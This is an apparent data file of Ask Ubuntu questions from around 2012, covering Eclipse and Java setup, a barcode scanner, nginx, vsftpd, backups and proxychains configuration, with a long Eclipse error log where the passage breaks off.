198527	desktop link to eclipse	i was tring to install eclipse on ubuntu . what i did : i unzipped the tar archive of eclipse . i tried to start eclipse from the command line - like this - ./eclipse . it works . but then i tried to create a desktop icon with : gnome-desktop-item-edit ~/desktop -- create-new . in a new icon i showed the path to the eclipse executable which i could launch from the command line . but then eclipse does not start stating : a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run eclipse . no java virtual machine was found after searching the following locations : /home/artem/eclipse/jre/bin/java java in your current path the same message appears if i try to launch eclipse by double-clicking its original launcher . so it starts from the terminal but not from the desktop ( it does not start when double-clicked ) and also i get a message in the terminal ( at some stage it appeared ) : ( gnome-desktop-item-edit:8998 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.dsv8lw ' : no such file or directory i am using ubuntu 12.04 x32 and eclipse juno . ps . path variable points at jdk/bin and java_home - to the jdk folder pss . i actually set the environment variables through .bashrc file ( java_home and path )
198529	zebex z-3100 usb scanner drops character	when scanning an ean-8 barcode containing the 8 digits 00032605 ubuntu incorrectly returns 0003265 while windows correctly return 00032605 . the last digit 5 is a check-digit . are there any configuration i should know about ? please help !
198532	how to install and use awesomewm alongside unity ?	how to install and use awesomewm in ubuntu 12.04 ?
198533	can i use mount command to `` increase '' my internal hard disk capacity using a usb drive ?	the internal hard disk of my home server is full and since it 's not possible to upgrade it i got a usb disk . all my home xbmc and other download services are perfectly working and configured to access and save data in /home/pitto/download . can i increase the amount of space to save data simply mounting my new disk ( /dev/sda ) this way ? root @ jeeves : /home/pitto/download # df -h file system dim . usati disp . uso % montato su /dev/hda3 71g 66g 1,1g 99 % / tmpfs 504m 0 504m 0 % /lib/init/rw udev 499m 132k 499m 1 % /dev tmpfs 504m 0 504m 0 % /dev/shm /dev/sda 459g 199m 435g 1 % /home/pitto/download
198535	howto enable boot messages in ubuntu 12.04 ?	hello when i do reboot or init 6 in console under ubuntu 12.04 my system does not start correctly . it freezes in startup process . wow can i enable the boot-messages instead of the splash-screen . is this still valid for ubuntu 12.04 ? how to enable boot messages to be printed on screen during boot up ?
198537	how do i install and configure twiki ?	could anyone tell me how to install and configure twiki release 5.1.2 on ubuntu 12.04 lts ? i have seen some instructions on the twiki website which applies to version 8.04 : sudo apt-get install apache2 twiki would this install the latest release ?
198540	wubi does n't boot after upgrade	i had wubi with ubuntu 10.04 . i just upgraded it to 12.04 , using the update manager . after the upgrade finished , i rebooted , but now , when i select `` ubuntu '' from the boot menu , i get a command-line prompt and can not continue . when i write `` boot '' in the prompt , i get `` no kernel loaded '' ... please help , i have important files in my wubi ...
198543	keyboard functions got swapped	i installed ubuntu 12.04 lts on my sony laptop . everything works fine . i have a minor issue : @ key got swapped with `` ~ key got swapped with some other key kindly suggest how to handle this issue
198549	what is `` cached '' in the top command ?	when running top , i get : top - 09:10:52 up 18:37 , 1 user , load average : 1.56 , 1.33 , 1.15 tasks : 39 total , 1 running , 38 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.1 % us , 0.6 % sy , 1.0 % ni , 92.5 % id , 5.8 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 4194304k total , 3045460k used , 1148844k free , 0k buffers swap : 0k total , 0k used , 0k free , 2256128k cached see the part : 2256128k cached ? what exactly does that mean ? i am comparing two vps from two provider , this one always has a large amount there ( 70 % of the used memory ) and the other vps provider always shows 0 .
198553	nginx and directory list does n't work:	i have done just as in the tutorials but is simply not working : server { location /abc { autoindex on ; root /home/user/abc/ ; } } it gives me 403 forbidden , what i 'm doing wrong ? thanks ; i 've tried to use a `` / '' at the end , and also without but no changes . when i go to myip/abc i hope to see some directory list but no . even if i try to go to myip/abc/myfile.txt it doesnt work .
198559	as a new developer , what files should i backup ?	i am facing some problems with current installation of ubuntu 12.04 . i 'd like to go for fresh installation of ubuntu 12.04 lts and i do n't have a separate partition of home folder . i have started doing simple jobs like package migration and ppa uploading etc with ubuntu . my request is , what are the files i have to backup to make sure my new installation is ready for development ?
198561	ubuntu 12.04 shutdown does not finish	when i shutdown my ubuntu 12,04 appears the `` shutdown screen '' and it never finish , keep shutting down ... i use `` tab key '' to see the log and the last line says `` stopping puppet agent '' ... and it never ends ( i need to either keep pushing power button or disconnect the cord ) i tried stopping the puppet service before shutdown but the problem persists.. thanks in advance
198562	why isnt there an ubuntu release name starting with c ( and a )	its breezy badger then dapper drake . where are clumsy chameleon and awesome antelope ?
198567	vsftpd installed , but i ca n't restart/stop it	i 've installed vsftpd on my vps running ubuntu server 10.04 . when connecting using ftp clients such as filezilla it 's working perfectly . however when i use my drupal 's native ftp client to update the modules and the core installation my `` working '' login credentials are not working . so after searching the internet , there are some configurations that should be changed on `` vsftpd.conf '' which i followed and those instructions say that i should restart my vsftpd . so after trying these commands sudo /etc/init.d/vsftpd restart service vsftpd restart both results to *respectively sudo : /etc/init.d/vsftpd : command not found service vsftpd restart then there 's another weird thing that went out when trying to find out the problem my self when i type ls -l /etc/init.d it results to . . . lrwxrwxrwx 1 root root 21 oct 2 06:29 vsftpd - > /lib/init/upstart-job what could be wrong ? any help would be greatly appreciated . thanks in advance !
198570	files backup utility with incremental backups that would keep backup device clean	i 've tested a few of backup utilities and still have n't found one that would satisfy me . almost every one of them has two options : - full backup - not an option to use frequently - incremental backup - seems right , but there 's one thing about it : incremental backup builds on a base of a full backup , backing up only those files , that were created/changed . the thing is , that after some time you 've got a lot of unwanted files from the old backups bloating your backup device . also , if you 'd accidentally delete your full ( first ) backup file , then the differential backups would be corrupted ( you would n't be able to restore them ) . the thing i 'm looking for is a program , that would backup files simply by copying them . it would check the backup device whether it contains the file ( unchanged ) : - if yes , it should proceed to the next file ( we 've got current version backed up ) - if no , it would copy the file to the backup device - if the device contains a file that is no longer on our disk , the program would delete it from the backup device is there any such utility , that would work this way ? if not , do you have any hints on how to backup fairly big amounts of data ( around 20gb ) quite frequently with incremental backups and not be exposed to those unwanted effects of backup size puffing up ?
198572	how do i disable the touchscreen drivers ?	i have a touchscreen , but the drivers are not working properly and interfere with my mouse . is it possible to disable my touchscreen , so that i can work again properly ?
198575	how to add dns automatically	when ever i install a website ( in ubuntu server ) i always need to add dns manually by going to my server hosting cpanel . i want to automate it i.e . by executing a shell script which will automatically add cname in dns zone , how it could be possible .
198578	how to fully utilize ram to increase overall system performance	i have a low profile machine but with a lot of fast ram , 4 gb , which is really an amount of memory that i probably will never use , not even an half , since i just use this machine for coding and browsing the web . the hdd is really slow and so the overall performance are bad when booting , caching or starting new program , i 'm wondering if ubuntu can provide some setting or utility to solve this situation and let my system rely more on the ram usage .
198588	installing a new theme on 12.04	how can the `` clearlooks compact '' theme be installed on 12.04 running unity and myunity ? the link says to drag a link from the author 's webpage to the appearance window but nothing happens when i do that . link to information on clearlooks compact
198590	error : no device connected	i did a fresh install of 12.04 by usb and it went fine , worked on it for several days , but one day the browser crashed and i reset the machine , after that i get this error when i boot ; error : no device connected error : no device connected error : no device connected error : no device connected this comes after the bios confirmation , and it stays for about 30 seconds , then the grub menu comes and when i selected the default the screen becomes purple and stays like that for a whole minuit . i thought maybe that is because i have 500gb hdd so i ran the boot-repair , it did nothing at all . i 'm sure i did the boot-repair thing right , sorry i forgot the paste url . if i reinstalled will this error persist .
198596	firewall settings for dropbox lan sync	i have two ubuntu 12.04 computers on a wireless home network , kept in sync using dropbox . i use dropbox rather than ubuntu one because of its lan sync feature - preferable to doing everything via the internet . will using gufw ( firewall ) disable this lan sync function ? if so , how do i get round it ?
198599	trouble chaining proxies	i 'm having trouble chaining proxies . i opened terminal , then run this : nano /etc/proxychains.conf i add the list like this [ proxylist ] # add proxy here ... # meanwile # defaults set to `` tor '' socks4 127.0.0.1 9050 socks5 59.21.114.99 5577 i open a new tab , run : proxychains firefox all i get is this proxychains-3.1 ( http : //proxychains.sf.net ) firefox opens but when i google my ip address it is not what it says in the list please help
198603	eclipse juno can not open with error `` an error has occurred . see the log file '' , ubuntu 12.04	i 'm trying to launch eclipse for the first time . i have downloaded the package and installed it manually when i launch it i get an error . here is the log file : ! session 2012-10-10 16:06:11.460 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=m20120914-1800 java.fullversion=gnu libgcj 4.6.3 bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-10-10 16:06:19.756 ! message could not start bundle : org.eclipse.equinox.console ! stack 0 org.osgi.framework.bundleexception : could not start bundle : org.eclipse.equinox.console at org.eclipse.osgi.framework.internal.core.consolemanager.checkforconsolebundle ( consolemanager.java:217 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.startup ( eclipsestarter.java:297 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:176 ) at java.lang.reflect.method.invoke ( libgcj.so.12 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) at org.eclipse.equinox.launcher.main.main ( main.java:1414 ) caused by : org.osgi.framework.bundleexception : exception in org.eclipse.equinox.console.command.adapter.activator.start ( ) of bundle org.eclipse.equinox.console . at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:734 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.start ( bundlecontextimpl.java:683 ) at org.eclipse.osgi.framework.internal.core.bundlehost.startworker ( bundlehost.java:381 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.start ( abstractbundle.java:300 ) at org.eclipse.osgi.framework.internal.core.consolemanager.checkforconsolebundle ( consolemanager.java:215 ) ... 7 more caused by : org.osgi.framework.bundleexception : exception in org.apache.felix.gogo.command.activator.start ( ) of bundle org.apache.felix.gogo.command . at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:734 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.start ( bundlecontextimpl.java:683 ) at org.eclipse.osgi.framework.internal.core.bundlehost.startworker ( bundlehost.java:381 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.start ( abstractbundle.java:300 ) at org.eclipse.equinox.console.command.adapter.activator.startbundle ( activator.java:248 ) at org.eclipse.equinox.console.command.adapter.activator.start ( activator.java:239 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl $ 1.run ( bundlecontextimpl.java:711 ) at java.security.accesscontroller.doprivileged ( libgcj.so.12 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:702 ) ... 11 more caused by : java.lang.noclassdeffounderror : org.apache.felix.gogo.command.obr at java.lang.class.initializeclass ( libgcj.so.12 ) at org.apache.felix.gogo.command.activator.start ( activator.java:54 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl $ 1.run ( bundlecontextimpl.java:711 ) at java.security.accesscontroller.doprivileged ( libgcj.so.12 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:702 ) ... 19 more caused by : java.lang.classnotfoundexception : org.apache.felix.bundlerepository.repository at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:501 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( libgcj.so.12 ) at java.lang.class.initializeclass ( libgcj.so.12 ) ... 23 more root exception : java.lang.noclassdeffounderror : org.apache.felix.gogo.command.obr at java.lang.class.initializeclass ( libgcj.so.12 ) at ! entry org.eclipse.osgi 2 0 2012-10-10 16:06:30.433 ! message the following is a complete list of bundles which are not resolved , see the prior log entry for the root cause if it exists : ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.433 ! message bundle com.sun.el_2.2.0.v201108011116 [ 4 ] was not resolved . ! subentry 2 com.sun.el 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.el_2.2.0 . ! subentry 2 com.sun.el 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.http_2.5.0 . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.434 ! message bundle javax.el_2.2.0.v201108011116 [ 6 ] was not resolved . ! subentry 2 javax.el 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet_2.5.0 . ! subentry 2 javax.el 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.http_2.5.0 . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.434 ! message bundle javax.servlet_3.0.0.v201112011016 [ 8 ] was not resolved . ! subentry 2 javax.servlet 2 0 2012-10-10 16:06:30.434 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.434 ! message bundle javax.servlet.jsp_2.2.0.v201112011158 [ 9 ] was not resolved . ! subentry 2 javax.servlet.jsp 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.el_2.2.0 . ! subentry 2 javax.servlet.jsp 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 javax.servlet.jsp 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.http_2.6.0 . ! subentry 2 javax.servlet.jsp 2 0 2012-10-10 16:06:30.434 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.434 ! message bundle org.apache.jasper.glassfish_2.2.2.v201205150955 [ 21 ] was not resolved . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.el_2.2.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.descriptor_2.6.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.http_2.6.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.jsp_2.2.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.jsp.el_2.2.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet.jsp.tagext_2.2.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing optionally imported package javax.tools_0.0.0 . ! subentry 2 org.apache.jasper.glassfish 2 0 2012-10-10 16:06:30.434 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.434 ! message bundle org.eclipse.equinox.http.jetty_3.0.0.v20120522-1841 [ 91 ] was not resolved . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.434 ! message missing imported package javax.servlet_ [ 2.6.0,4.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package javax.servlet.http_ [ 2.6.0,4.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.equinox.http.servlet_1.0.0 . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.http_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.io.bio_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.io.nio_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server.bio_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server.handler_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server.nio_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server.session_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.server.ssl_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.servlet_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.util_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.util.component_ [ 8.0.0,9.0.0 ) . ! subentry 2 org.eclipse.equinox.http.jetty 2 0 2012-10-10 16:06:30.435 ! message missing imported package org.eclipse.jetty.util.log_ [ 8.0.0,9.0.0 ) . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.435 ! message bundle org.eclipse.equinox.http.registry_1.1.200.v20120522-2049 [ 92 ] was not resolved . ! subentry 2 org.eclipse.equinox.http.registry 2 0 2012-10-10 16:06:30.435 ! message missing imported package javax.servlet_2.3.0 . ! subentry 2 org.eclipse.equinox.http.registry 2 0 2012-10-10 16:06:30.435 ! message missing imported package javax.servlet.http_2.3.0 . ! subentry 2 org.eclipse.equinox.http.registry 2 0 2012-10-10 16:06:30.435 ! message missing required capability require-capability : osgi.ee ; filter= '' ( | ( & ( osgi.ee=cdc/foundation ) ( version=1.0 ) ) ( & ( osgi.ee=javase ) ( version=1.3 ) ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.435 ! message bundle org.eclipse.equinox.http.servlet_1.1.300.v20120522-1841 [ 93 ] was not resolved . ! subentry 2 org.eclipse.equinox.http.servlet 2 0 2012-10-10 16:06:30.435 ! message missing imported package javax.servlet_ [ 2.3.0,3.1.0 ) . ! subentry 2 org.eclipse.equinox.http.servlet 2 0 2012-10-10 16:06:30.435 ! message missing optionally imported package javax.servlet.annotation_2.6.0 . ! subentry 2 org.eclipse.equinox.http.servlet 2 0 2012-10-10 16:06:30.435 ! message missing optionally imported package javax.servlet.descriptor_2.6.0 . ! subentry 2 org.eclipse.equinox.http.servlet 2 0 2012-10-10 16:06:30.435 ! message missing imported package javax.servlet.http_ [ 2.3.0,3.1.0 ) . ! subentry 2 org.eclipse.equinox.http.servlet 2 0 2012-10-10 16:06:30.436 ! message missing required capability require-capability : osgi.ee ; filter= '' ( | ( & ( osgi.ee=cdc/foundation ) ( version=1.0 ) ) ( & ( osgi.ee=javase ) ( version=1.3 ) ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.436 ! message bundle org.eclipse.equinox.jsp.jasper_1.0.400.v20120522-2049 [ 94 ] was not resolved . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet_ [ 2.4.0,3.1.0 ) . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing optionally imported package javax.servlet.annotation_2.6.0 . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing optionally imported package javax.servlet.descriptor_2.6.0 . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet.http_ [ 2.4.0,3.1.0 ) . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet.jsp_ [ 2.0.0,2.3.0 ) . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing imported package org.apache.jasper.servlet_ [ 0.0.0,6.0.0 ) . ! subentry 2 org.eclipse.equinox.jsp.jasper 2 0 2012-10-10 16:06:30.436 ! message missing required capability require-capability : osgi.ee ; filter= '' ( | ( & ( osgi.ee=cdc/foundation ) ( version=1.0 ) ) ( & ( osgi.ee=javase ) ( version=1.3 ) ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.436 ! message bundle org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20120522-2049 [ 95 ] was not resolved . ! subentry 2 org.eclipse.equinox.jsp.jasper.registry 2 0 2012-10-10 16:06:30.436 ! message missing imported package org.eclipse.equinox.jsp.jasper_0.0.0 . ! subentry 2 org.eclipse.equinox.jsp.jasper.registry 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet_2.4.0 . ! subentry 2 org.eclipse.equinox.jsp.jasper.registry 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet.http_2.4.0 . ! subentry 2 org.eclipse.equinox.jsp.jasper.registry 2 0 2012-10-10 16:06:30.436 ! message missing required capability require-capability : osgi.ee ; filter= '' ( | ( & ( osgi.ee=cdc/foundation ) ( version=1.0 ) ) ( & ( osgi.ee=javase ) ( version=1.3 ) ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.436 ! message bundle org.eclipse.help.webapp_3.6.101.v20120717-130216 [ 135 ] was not resolved . ! subentry 2 org.eclipse.help.webapp 2 0 2012-10-10 16:06:30.436 ! message missing required bundle org.eclipse.equinox.jsp.jasper.registry_1.0.100 . ! subentry 2 org.eclipse.help.webapp 2 0 2012-10-10 16:06:30.436 ! message missing required bundle org.eclipse.equinox.http.registry_1.0.200 . ! subentry 2 org.eclipse.help.webapp 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet_2.4.0 . ! subentry 2 org.eclipse.help.webapp 2 0 2012-10-10 16:06:30.436 ! message missing imported package javax.servlet.http_2.4.0 . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.437 ! message bundle org.eclipse.jdt.apt.pluggable.core_1.0.400.v20120522-1651 [ 139 ] was not resolved . ! subentry 2 org.eclipse.jdt.apt.pluggable.core 2 0 2012-10-10 16:06:30.437 ! message missing imported package org.eclipse.jdt.internal.compiler.tool_0.0.0 . ! subentry 2 org.eclipse.jdt.apt.pluggable.core 2 0 2012-10-10 16:06:30.437 ! message missing imported package org.eclipse.jdt.internal.compiler.apt.dispatch_0.0.0 . ! subentry 2 org.eclipse.jdt.apt.pluggable.core 2 0 2012-10-10 16:06:30.437 ! message missing imported package org.eclipse.jdt.internal.compiler.apt.model_0.0.0 . ! subentry 2 org.eclipse.jdt.apt.pluggable.core 2 0 2012-10-10 16:06:30.437 ! message missing imported package org.eclipse.jdt.internal.compiler.apt.util_0.0.0 . ! subentry 2 org.eclipse.jdt.apt.pluggable.core 2 0 2012-10-10 16:06:30.437 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.437 ! message bundle org.eclipse.jdt.compiler.apt_1.0.500.v20120522-1651 [ 141 ] was not resolved . ! subentry 2 org.eclipse.jdt.compiler.apt 2 0 2012-10-10 16:06:30.437 ! message missing optionally imported package org.eclipse.jdt.internal.compiler.tool_0.0.0 . ! subentry 2 org.eclipse.jdt.compiler.apt 2 0 2012-10-10 16:06:30.437 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.437 ! message bundle org.eclipse.jdt.compiler.tool_1.0.101.v20120522-1651 [ 142 ] was not resolved . ! subentry 2 org.eclipse.jdt.compiler.tool 2 0 2012-10-10 16:06:30.437 ! message missing required capability require-capability : osgi.ee ; filter= '' ( & ( osgi.ee=javase ) ( version=1.6 ) ) '' . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.437 ! message bundle org.eclipse.jetty.continuation_8.1.3.v20120522 [ 155 ] was not resolved . ! subentry 2 org.eclipse.jetty.continuation 2 0 2012-10-10 16:06:30.437 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 org.eclipse.jetty.continuation 2 0 2012-10-10 16:06:30.437 ! message missing optionally imported package org.mortbay.log_ [ 6.1.0,7.0.0 ) . ! subentry 2 org.eclipse.jetty.continuation 2 0 2012-10-10 16:06:30.437 ! message missing optionally imported package org.mortbay.util.ajax_ [ 6.1.0,7.0.0 ) . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.437 ! message bundle org.eclipse.jetty.http_8.1.3.v20120522 [ 156 ] was not resolved . ! subentry 2 org.eclipse.jetty.http 2 0 2012-10-10 16:06:30.437 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 org.eclipse.jetty.http 2 0 2012-10-10 16:06:30.437 ! message missing imported package javax.servlet.http_2.6.0 . ! subentry 2 org.eclipse.jetty.http 2 0 2012-10-10 16:06:30.437 ! message missing imported package org.eclipse.jetty.io_ [ 8.1.0,9.0.0 ) . org.eclipse.jetty.util.resource_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.http 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.util.ssl_ [ 8.1.0,9.0.0 ) . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.438 ! message bundle org.eclipse.jetty.io_8.1.3.v20120522 [ 157 ] was not resolved . ! subentry 2 org.eclipse.jetty.io 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.util_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.io 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.util.component_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.io 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.util.log_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.io 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.util.thread_ [ 8.1.0,9.0.0 ) . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.438 ! message bundle org.eclipse.jetty.security_8.1.3.v20120522 [ 158 ] was not resolved . ! subentry 2 org.eclipse.jetty.security 2 0 2012-10-10 16:06:30.438 ! message missing imported package javax.servlet_2.6.0 . ! subentry 2 org.eclipse.jetty.security 2 0 2012-10-10 16:06:30.438 ! message missing imported package javax.servlet.http_2.6.0 . ! subentry 2 org.eclipse.jetty.security 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.http_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.security 2 0 2012-10-10 16:06:30.438 ! message missing imported package org.eclipse.jetty.server_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.security 2 0 2012-10-10 16:06:30.438 org.eclipse.jetty.jmx_8.0.0 . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.439 ! message missing imported package org.eclipse.jetty.security_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing imported package org.eclipse.jetty.server_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing imported package org.eclipse.jetty.server.handler_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing imported package org.eclipse.jetty.server.nio_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing imported package org.eclipse.jetty.server.session_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing imported package org.eclipse.jetty.server.ssl_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.eclipse.jetty.util_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.eclipse.jetty.util.component_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.eclipse.jetty.util.log_ [ 8.1.0,9.0.0 ) . ! subentry 2 org.eclipse.jetty.servlet 2 0 2012-10-10 16:06:30.440 ! message missing optionally imported package org.eclipse.jetty.util.resource_ [ 8.1.0,9.0.0 ) . ! subentry 1 org.eclipse.osgi 2 0 2012-10-10 16:06:30.440 ! message bundle org.eclipse.jetty.util_8.1.3.v20120522 [ 161 ] was not resolved . ! subentry 2 